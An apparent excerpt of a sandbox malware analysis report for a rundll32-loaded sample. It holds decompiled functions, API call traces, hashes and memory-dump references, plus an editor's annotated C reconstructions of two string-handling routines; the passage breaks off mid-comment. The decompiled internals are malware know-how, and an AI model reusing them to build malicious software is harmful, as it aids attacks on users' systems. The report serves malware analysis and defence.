                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                            • String ID:
                            • API String ID: 1610602887-0
                            • Opcode ID: 79d9a76a0aa66ac51e72b2a3d66e00cc1bb1dc8dd54149b8cd491d8f41aeb59f
                            • Instruction ID: 053b319af1249c97d477cd2d09ce3da00f3b0912709f6c879d5aaebfeb1cbc12
                            • Opcode Fuzzy Hash: 79d9a76a0aa66ac51e72b2a3d66e00cc1bb1dc8dd54149b8cd491d8f41aeb59f
                            • Instruction Fuzzy Hash: 58F0A4B7A002087BE7149BA4CC1DFDF76BDDBC4355F050124F601E7240E678AA01C650
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671D3
                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,04F8A170,00000000,04F75D81,?,04F6F2F7,?), ref: 04F671DE
                            • _wcsupr.NTDLL ref: 04F671EB
                            • lstrlenW.KERNEL32(00000000), ref: 04F671F3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                            • String ID:
                            • API String ID: 2533608484-0
                            • Opcode ID: e03ff5936238a4162676a99153f225249d7c3190eba9a17c8fbc8c59266819a2
                            • Instruction ID: 1be3c36c2942f559ad37f16032474d22a275970cedcb4dda940a11ddead3ee88
                            • Opcode Fuzzy Hash: e03ff5936238a4162676a99153f225249d7c3190eba9a17c8fbc8c59266819a2
                            • Instruction Fuzzy Hash: C9F0E9326011152FA3127E75AC88E7F779CFF8179C710082DF606DA144DE68DC038AA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F7C3A3
                              • Part of subcall function 04F68FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 04F68FBA
                              • Part of subcall function 04F68FAE: CloseHandle.KERNEL32(?), ref: 04F68FC8
                              • Part of subcall function 04F68FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F68FE4
                            • FindCloseChangeNotification.KERNEL32(?), ref: 04F7C3B1
                            • InterlockedDecrement.KERNEL32(04F8A05C), ref: 04F7C3C0
                              • Part of subcall function 04F7E831: SetEvent.KERNEL32(000005BC,04F7C3DB), ref: 04F7E83B
                              • Part of subcall function 04F7E831: CloseHandle.KERNEL32(000005BC), ref: 04F7E850
                              • Part of subcall function 04F7E831: HeapDestroy.KERNELBASE(05F20000), ref: 04F7E860
                            • RtlExitUserThread.NTDLL(00000000), ref: 04F7C3DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
                            • String ID:
                            • API String ID: 2993087875-0
                            • Opcode ID: 86a880ee0aa9570a50a93c1cb0be6e8dd066dc38127c0e69058cb5b1a09d4e6c
                            • Instruction ID: 4946ee2d8746ab9e5c744d6973e0ff6047371aa0ee0ca6198700816d65ec016f
                            • Opcode Fuzzy Hash: 86a880ee0aa9570a50a93c1cb0be6e8dd066dc38127c0e69058cb5b1a09d4e6c
                            • Instruction Fuzzy Hash: DAF04430940608BFE7116F68AC49E6D3B68FB41730B11021EF5159B1C0EA7CAD028B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E04A1765B(void** __esi) {
                            				intOrPtr _v0;
                            				intOrPtr _t4;
                            				intOrPtr _t6;
                            				void* _t8;
                            				void* _t9;
                            				intOrPtr _t10;
                            				void* _t11;
                            				void** _t13;
                            
                            				_t13 = __esi;
                            				_t4 =  *0x4a1a3cc; // 0x55395b0
                            				__imp__(_t4 + 0x40);
                            				while(1) {
                            					_t6 =  *0x4a1a3cc; // 0x55395b0
                            					_t1 = _t6 + 0x58; // 0x0
                            					if( *_t1 == 0) {
                            						break;
                            					}
                            					Sleep(0xa);
                            				}
                            				_t8 =  *_t13;
                            				if(_t8 != 0 && _t8 != 0x4a1a030) {
                            					HeapFree( *0x4a1a2d8, 0, _t8);
                            				}
                            				_t9 = E04A16E6D(_v0, _t13); // executed
                            				_t13[1] = _t9;
                            				_t10 =  *0x4a1a3cc; // 0x55395b0
                            				_t11 = _t10 + 0x40;
                            				__imp__(_t11);
                            				return _t11;
                            			}

                            APIs
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A17664
                            • Sleep.KERNEL32(0000000A), ref: 04A1766E
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A17696
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A176B2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 30ba9e2c3d63bf0b9babbb8d7f3acceea50c6880b81dd0f68d0ee893ffe3f021
                            • Instruction ID: a79251dc1e937957e990bf4d36c40cb7bc3388eaf69305b7c22f57a5a7f3e251
                            • Opcode Fuzzy Hash: 30ba9e2c3d63bf0b9babbb8d7f3acceea50c6880b81dd0f68d0ee893ffe3f021
                            • Instruction Fuzzy Hash: A5F058B46012419FF720AF68DC48F1A3BB8EF20B80B005405F515C62B5C228FC42DB19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7A477
                            • memcpy.NTDLL ref: 04F7A49F
                              • Part of subcall function 04F77950: NtAllocateVirtualMemory.NTDLL(04F7EB0F,00000000,00000000,04F7EB0F,00003000,00000040), ref: 04F77981
                              • Part of subcall function 04F77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 04F77988
                              • Part of subcall function 04F77950: SetLastError.KERNEL32(00000000), ref: 04F7798F
                            • GetLastError.KERNEL32(00000010,00000218,04F8386D,00000100,?,00000318,00000008), ref: 04F7A4B6
                            • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04F8386D,00000100), ref: 04F7A599
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                            • String ID:
                            • API String ID: 685050087-0
                            • Opcode ID: 77a813ba23b3ae29494af356c58a122e8fdd8423be2d8e9783863003ac8839ce
                            • Instruction ID: 5db175f42c8af301b7cc02e7903399d5683b43b131e39b352abf297fdb42cffa
                            • Opcode Fuzzy Hash: 77a813ba23b3ae29494af356c58a122e8fdd8423be2d8e9783863003ac8839ce
                            • Instruction Fuzzy Hash: 7A4193B2904705AFD721DF24DC41FABB7E9FB48310F00892EF999C6290E735E5158B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A1216C(void* __edx) {
                            				void* _v8;
                            				int _v12;
                            				WCHAR* _v16;
                            				void* __edi;
                            				void* __esi;
                            				void* _t23;
                            				intOrPtr _t24;
                            				void* _t26;
                            				intOrPtr _t32;
                            				intOrPtr _t35;
                            				void* _t37;
                            				intOrPtr _t38;
                            				intOrPtr _t42;
                            				void* _t45;
                            				void* _t50;
                            				void* _t52;
                            
                            				_t50 = __edx;
                            				_v12 = 0;
                            				_t23 = E04A13695(0,  &_v8); // executed
                            				if(_t23 != 0) {
                            					_v8 = 0;
                            				}
                            				_t24 =  *0x4a1a348; // 0xb1d5a8
                            				_t4 = _t24 + 0x4a1be58; // 0x5539400
                            				_t5 = _t24 + 0x4a1be00; // 0x4f0053
                            				_t26 = E04A1155C( &_v16, _v8, _t5, _t4); // executed
                            				_t45 = _t26;
                            				if(_t45 == 0) {
                            					StrToIntExW(_v16, 0,  &_v12);
                            					_t45 = 8;
                            					if(_v12 < _t45) {
                            						_t45 = 1;
                            						__eflags = 1;
                            					} else {
                            						_t32 =  *0x4a1a348; // 0xb1d5a8
                            						_t11 = _t32 + 0x4a1be4c; // 0x55393f4
                            						_t48 = _t11;
                            						_t12 = _t32 + 0x4a1be00; // 0x4f0053
                            						_t52 = E04A128C4(_t11, _t12, _t11);
                            						_t59 = _t52;
                            						if(_t52 != 0) {
                            							_t35 =  *0x4a1a348; // 0xb1d5a8
                            							_t13 = _t35 + 0x4a1ba51; // 0x30314549
                            							_t37 = E04A141FA(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                            							if(_t37 == 0) {
                            								_t61 =  *0x4a1a2fc - 6;
                            								if( *0x4a1a2fc <= 6) {
                            									_t42 =  *0x4a1a348; // 0xb1d5a8
                            									_t15 = _t42 + 0x4a1bde2; // 0x52384549
                            									E04A141FA(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                            								}
                            							}
                            							_t38 =  *0x4a1a348; // 0xb1d5a8
                            							_t17 = _t38 + 0x4a1be90; // 0x5539438
                            							_t18 = _t38 + 0x4a1be68; // 0x680043
                            							_t45 = E04A174B6(_v8, 0x80000001, _t52, _t18, _t17);
                            							HeapFree( *0x4a1a2d8, 0, _t52);
                            						}
                            					}
                            					HeapFree( *0x4a1a2d8, 0, _v16);
                            				}
                            				_t54 = _v8;
                            				if(_v8 != 0) {
                            					E04A13AC2(_t54);
                            				}
                            				return _t45;
			}

			Statement address column (flattened by extraction; one address per statement above, 0x04a1216c through 0x04a1227e)

                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05539400,00000000,?,7620F710,00000000,7620F730), ref: 04A121BB
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05539438,?,00000000,30314549,00000014,004F0053,055393F4), ref: 04A12258
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04A166BE), ref: 04A1226A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: d6453ee81524c057be6986ef1aab7b737ce0094080a666e043f685a434e2da60
                            • Instruction ID: 7be27148074215f3c82e8748110a690c6b6b472efcfb41d9b91b62c846eccc41
                            • Opcode Fuzzy Hash: d6453ee81524c057be6986ef1aab7b737ce0094080a666e043f685a434e2da60
                            • Instruction Fuzzy Hash: F831AB36A01208BFEB12DF94DC84FDE3BBDEB48704F0440A5A604AB071D2B1BE05DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E04A143EB(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                            				void* _v8;
                            				char _v48;
                            				void* __edi;
                            				intOrPtr _t22;
                            				intOrPtr _t30;
                            				intOrPtr _t34;
                            				intOrPtr* _t42;
                            				void* _t43;
                            				void* _t46;
                            				intOrPtr* _t48;
                            				void* _t49;
                            				intOrPtr _t51;
                            
                            				_t42 = _a16;
                            				_t48 = __eax;
                            				_t22 =  *0x4a1a348; // 0xb1d5a8
                            				_t2 = _t22 + 0x4a1b67a; // 0x657a6973
                            				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
                            				if( *0x4a1a2ec >= 5) {
                            					_t30 = E04A156C8(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
                            					L5:
                            					_a4 = _t30;
                            					L6:
                            					if(_a4 != 0) {
                            						L9:
                            						 *0x4a1a2ec =  *0x4a1a2ec + 1;
                            						L10:
                            						return _a4;
                            					}
                            					_t50 = _a16;
                            					 *_t48 = _a16;
                            					_t49 = _v8;
                            					 *_t42 = E04A1708D(_t50, _t49); // executed
                            					_t34 = E04A12B23(_t49, _t50); // executed
                            					if(_t34 != 0) {
                            						 *_a8 = _t49;
                            						 *_a12 = _t34;
                            						if( *0x4a1a2ec < 5) {
                            							 *0x4a1a2ec =  *0x4a1a2ec & 0x00000000;
                            						}
                            						goto L10;
                            					}
                            					_a4 = 0xbf;
                            					E04A1561E();
                            					HeapFree( *0x4a1a2d8, 0, _t49);
                            					goto L9;
                            				}
                            				_t51 =  *0x4a1a3e0; // 0x5539b78
                            				if(RtlAllocateHeap( *0x4a1a2d8, 0, 0x800) == 0) {
                            					_a4 = 8;
                            					goto L6;
                            				}
                            				_t30 = E04A1300E(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
                            				goto L5;
			}

			Statement address column (flattened by extraction; one address per statement above, 0x04a143f2 through 0x04a144d5)

                            APIs
                            • wsprintfA.USER32 ref: 04A1440D
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A14432
                              • Part of subcall function 04A1300E: GetTickCount.KERNEL32 ref: 04A13025
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A13072
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A1308F
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A130B1
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A130D8
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A13103
                              • Part of subcall function 04A1300E: HeapFree.KERNEL32(00000000,?), ref: 04A13116
                              • Part of subcall function 04A1300E: wsprintfA.USER32 ref: 04A13135
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04A144AC
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: wsprintf$Heap$Free$AllocateCountTick
                            • String ID:
                            • API String ID: 1307794992-0
                            • Opcode ID: 69c5c8242b822697722a714d495511f88266ea6dc9b0a32c33636cfbced5b350
                            • Instruction ID: 791d8b066a209f929e73e59a4afbf19bb2b5801bd9bdd49351060498c9951a43
                            • Opcode Fuzzy Hash: 69c5c8242b822697722a714d495511f88266ea6dc9b0a32c33636cfbced5b350
                            • Instruction Fuzzy Hash: 2B313E75601208EFDB01DF98D984EDA3BBCFB58359F108022F905AB271D774E946CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7B7A4: RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                              • Part of subcall function 04F7B7A4: lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            • RegQueryValueExA.KERNEL32(00000000,746BC740,00000000,00000000,04F89068,04F6E6ED,00000001,00000000,0631C314,04F8906E,00000000,00000000,04F7CB01,0631C314,746BC740,00000000), ref: 04F76C72
                            • RegSetValueExA.KERNEL32(04F89068,00000003,00000000,00000003,04F89068,00000028), ref: 04F76CB3
                            • RegCloseKey.ADVAPI32(?), ref: 04F76CBF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$CloseCreateQuerylstrlen
                            • String ID:
                            • API String ID: 2552977122-0
                            • Opcode ID: 666065d41c388b8c255622d78aa580ef8562b30e305e39ddb982cf0ae96f4a37
                            • Instruction ID: b1f6b87ba32787864644afaae24b35f24b69cc371cf24b7b1826cb7cb579fddb
                            • Opcode Fuzzy Hash: 666065d41c388b8c255622d78aa580ef8562b30e305e39ddb982cf0ae96f4a37
                            • Instruction Fuzzy Hash: 3F312FB1D00218EFEB229FA4ED44DBEBBB8EB04724F10416FE915AA240D3796E45DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F8087A: lstrlen.KERNEL32(?,00000000,04F7BA3E,00000027,04F8A1E8,?,00000000,?,?,04F7BA3E,?,00000001,?,04F70971,00000000,?), ref: 04F808B0
                              • Part of subcall function 04F8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 04F808D4
                              • Part of subcall function 04F8087A: lstrcat.KERNEL32(00000000,00000000), ref: 04F808DC
                            • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 04F662A8
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 04F662BE
                            • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04F66307
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Open$Closelstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 4131162436-0
                            • Opcode ID: 405b514bba341c6f1f41fbaf841fb67d2c71d95c158a289a86e2da5fd1008ea1
                            • Instruction ID: 3b137bc215e2afd7743bfde793faf71914e96276f2c32a61a88f05a8d744755b
                            • Opcode Fuzzy Hash: 405b514bba341c6f1f41fbaf841fb67d2c71d95c158a289a86e2da5fd1008ea1
                            • Instruction Fuzzy Hash: AE210BB1D0010DBFEB01DF95DD85CAEBBBDEB44218B10406AE601E7211D774AE56DF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E04A13B58(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                            				char _v5;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				char _t28;
                            				void* _t33;
                            				void* _t38;
                            				void* _t45;
                            				char* _t46;
                            				void* _t48;
                            				char* _t56;
                            				char* _t57;
                            				intOrPtr _t59;
                            				void* _t60;
                            
                            				_t56 = _a4;
                            				_t60 = __eax;
                            				_v12 = 0xb;
                            				if(_t56 != 0 && __eax != 0) {
                            					_t5 = _t60 - 1; // -1
                            					_t46 =  &(_t56[_t5]);
                            					_t28 =  *_t46;
                            					_v5 = _t28;
                            					 *_t46 = 0;
                            					__imp__(_a8, _t45);
                            					_v16 = _t28;
                            					_t57 = StrStrA(_t56, _a8);
                            					if(_t57 != 0) {
                            						 *_t46 = _v5;
                            						_t33 = RtlAllocateHeap( *0x4a1a2d8, 0, _a16 + _t60); // executed
                            						_t48 = _t33;
                            						if(_t48 == 0) {
                            							_v12 = 8;
                            						} else {
                            							_t58 = _t57 - _a4;
                            							E04A17A1E(_t57 - _a4, _a4, _t48);
                            							_t38 = E04A17A1E(_a16, _a12, _t58 + _t48);
                            							_t53 = _v16;
                            							_t59 = _a16;
                            							E04A17A1E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                            							 *_a20 = _t48;
                            							_v12 = _v12 & 0x00000000;
                            							 *_a24 = _t60 - _v16 + _t59;
                            						}
                            					}
                            				}
                            				return _v12;
			}

			Statement address column (flattened by extraction; one address per statement above, 0x04a13b60 through 0x04a13c1f)

                            APIs
                            • lstrlen.KERNEL32(7620F710,?,00000000,?,7620F710), ref: 04A13B8C
                            • StrStrA.SHLWAPI(00000000,?), ref: 04A13B99
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A13BB8
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 556738718-0
                            • Opcode ID: b956889d9cad1552710c534954a6826ed9f876e50abb9204c5a46c9c0fae1b2b
                            • Instruction ID: d408881b35d18ba386eff753475faf11e5320b0a25ddb6b4f3344ee03dae1d9c
                            • Opcode Fuzzy Hash: b956889d9cad1552710c534954a6826ed9f876e50abb9204c5a46c9c0fae1b2b
                            • Instruction Fuzzy Hash: 81218E39600249AFDF118F68C884B9EBFB5EF89314F088151ED04AB315D735EE59CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%
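The listing for E04A13B58 above reads as a first-occurrence splice over a length-counted buffer: find the needle with StrStrA, allocate a buffer of the input length plus the replacement length, and copy prefix, replacement and remainder into it. The detail a reader of its callers will want is how the search is made safe for a terminator-driven API: the routine overwrites the last byte of the input with a NUL before searching, so a needle that overlaps that byte can never match, and it restores the byte only on the match path. The following is an editor's reconstruction in standard C, added for readability; it is not the sample's code. The function name, the macro names and the constructed HTTP request line are assumptions; the return values 0, 8 and 0xb are the listing's.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Editor's reconstruction of the splice routine decompiled above as
 * E04A13B58; this is not the sample's code. Semantics read from the listing:
 *   src, src_len : length-counted input (the listing does not rely on a NUL)
 *   pat          : NUL-terminated needle, located with StrStrA
 *   rep, rep_len : bytes spliced in where the first match sat
 *   out, out_len : receive a new heap buffer and its length (caller frees)
 * Return codes are the listing's: 0 on success, 8 when allocation fails,
 * 0xb when the input is empty or the needle is absent. The macro names and
 * the function name are assumptions. */
#define SPLICE_OK         0
#define SPLICE_NO_MEMORY  8
#define SPLICE_NOT_FOUND  0xb

unsigned int splice_first(char *src, size_t src_len, const char *pat,
                          const char *rep, size_t rep_len,
                          char **out, size_t *out_len)
{
    if (src == NULL || src_len == 0)
        return SPLICE_NOT_FOUND;

    /* The listing overwrites the LAST byte of src with a NUL so the
     * terminator-driven StrStrA cannot run off the buffer, then searches.
     * Two consequences worth knowing when reading its callers:
     *  - a needle that overlaps the final byte can never match;
     *  - the listing restores the byte only on the match path, so a miss
     *    leaves the caller's buffer truncated by one. This reconstruction
     *    restores it unconditionally. */
    char *last = src + src_len - 1;
    char saved = *last;
    *last = '\0';
    size_t pat_len = strlen(pat);
    char *hit = strstr(src, pat);
    *last = saved;
    if (hit == NULL)
        return SPLICE_NOT_FOUND;

    char *buf = malloc(src_len + rep_len);
    if (buf == NULL)
        return SPLICE_NO_MEMORY;

    /* prefix, replacement, remainder: the three copies in the listing */
    size_t off = (size_t)(hit - src);
    memcpy(buf, src, off);
    memcpy(buf + off, rep, rep_len);
    memcpy(buf + off + rep_len, src + off + pat_len, src_len - off - pat_len);

    *out = buf;
    *out_len = src_len - pat_len + rep_len;
    return SPLICE_OK;
}

/* Runs the routine on constructed input; returns 0 when every check holds. */
int splice_demo(void)
{
    char req[] = "GET /index.html HTTP/1.1";           /* constructed */
    char *out = NULL;
    size_t n = 0;
    if (splice_first(req, strlen(req), "index.html", "login.php", 9,
                     &out, &n) != SPLICE_OK)
        return 1;
    int ok = (n == 23 && memcmp(out, "GET /login.php HTTP/1.1", 23) == 0);
    free(out);
    if (!ok)
        return 2;

    /* a needle ending on the last byte is invisible to the search */
    char tail[] = "abcXYZ";
    if (splice_first(tail, 6, "XYZ", "Q", 1, &out, &n) != SPLICE_NOT_FOUND)
        return 3;
    if (strcmp(tail, "abcXYZ") != 0)                    /* buffer intact */
        return 4;
    return 0;
}

int main(void)
{
    printf("splice_demo: %s\n", splice_demo() == 0 ? "ok" : "FAILED");
    return 0;
}
```

The second scenario in splice_demo is the one to keep in mind when tracing how the sample patches buffers: a needle that reaches the final byte of the input is never found, and in the sample (unlike this reconstruction) that miss also leaves the input shortened by one byte.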

                            C-Code - Quality: 47%
                            			E04A16E6D(char* _a4, char** _a8) {
                            				char* _t7;
                            				char* _t11;
                            				char* _t14;
                            				char* _t16;
                            				char* _t17;
                            				char _t18;
                            				signed int _t20;
                            				signed int _t22;
                            
                            				_t16 = _a4;
                            				_push(0x20);
                            				_t20 = 1;
                            				_push(_t16);
                            				while(1) {
                            					_t7 = StrChrA();
                            					if(_t7 == 0) {
                            						break;
                            					}
                            					_t20 = _t20 + 1;
                            					_push(0x20);
                            					_push( &(_t7[1]));
                            				}
                            				_t11 = E04A16D63(_t20 << 2);
                            				_a4 = _t11;
                            				if(_t11 != 0) {
                            					StrTrimA(_t16, 0x4a19284); // executed
                            					_t22 = 0;
                            					do {
                            						_t14 = StrChrA(_t16, 0x20);
                            						if(_t14 != 0) {
                            							 *_t14 = 0;
                            							do {
                            								_t14 =  &(_t14[1]);
                            								_t18 =  *_t14;
                            							} while (_t18 == 0x20 || _t18 == 9);
                            						}
                            						_t17 = _a4;
                            						 *(_t17 + _t22 * 4) = _t16;
                            						_t22 = _t22 + 1;
                            						_t16 = _t14;
                            					} while (_t14 != 0);
                            					 *_a8 = _t17;
                            				}
                            				return 0;
			}

			Statement address column (flattened by extraction; one address per statement above, 0x04a16e71 through 0x04a16ee4)

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,055395AC,?,?,04A176A6,?,055395AC), ref: 04A16E89
                            • StrTrimA.SHLWAPI(?,04A19284,00000002,?,04A176A6,?,055395AC), ref: 04A16EA7
                            • StrChrA.SHLWAPI(?,00000020,?,04A176A6,?,055395AC), ref: 04A16EB2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: e95cba408aefa545b7fd86ac6ad6fe9035ea5f5bf95dc40d5db958feeca8c2ec
                            • Instruction ID: 0db7578b4f222a196becb12111d7170c50610412518ac5ac27857c21941f315a
                            • Opcode Fuzzy Hash: e95cba408aefa545b7fd86ac6ad6fe9035ea5f5bf95dc40d5db958feeca8c2ec
                            • Instruction Fuzzy Hash: 4001BC713003566FEB204F2ACC88F6B7B9DEBC5750F040111E941CB2E2DA70E802C6A0
                            Uniqueness

                            Uniqueness Score: -1.00%
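The listing for E04A16E6D above is an argv-style splitter: count the spaces to size a pointer array, StrTrimA the string, then cut it in place at each space and skip the run of spaces and tabs that follows. The following is an editor's reconstruction in standard C, added to make that control flow easy to follow; it is not the sample's code. The trim set at 0x4a19284 is not shown in the dump and is assumed to be " \t"; the function names and the constructed command line are assumptions; and two labelled deviations are made so the result is checkable: the listing returns only the array pointer and always returns 0, whereas this version returns the token count and NULL-terminates the array.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Editor's reconstruction of the argument splitter decompiled above as
 * E04A16E6D; this is not the sample's code. As read from the listing: the
 * string is trimmed with StrTrimA (the trim set lives at 0x4a19284 and is not
 * shown in the dump; " \t" is assumed here), then cut in place at each ' ',
 * and the run of ' ' / '\t' that follows a cut is skipped. The pointer
 * array is sized from the number of spaces plus one, an upper bound because
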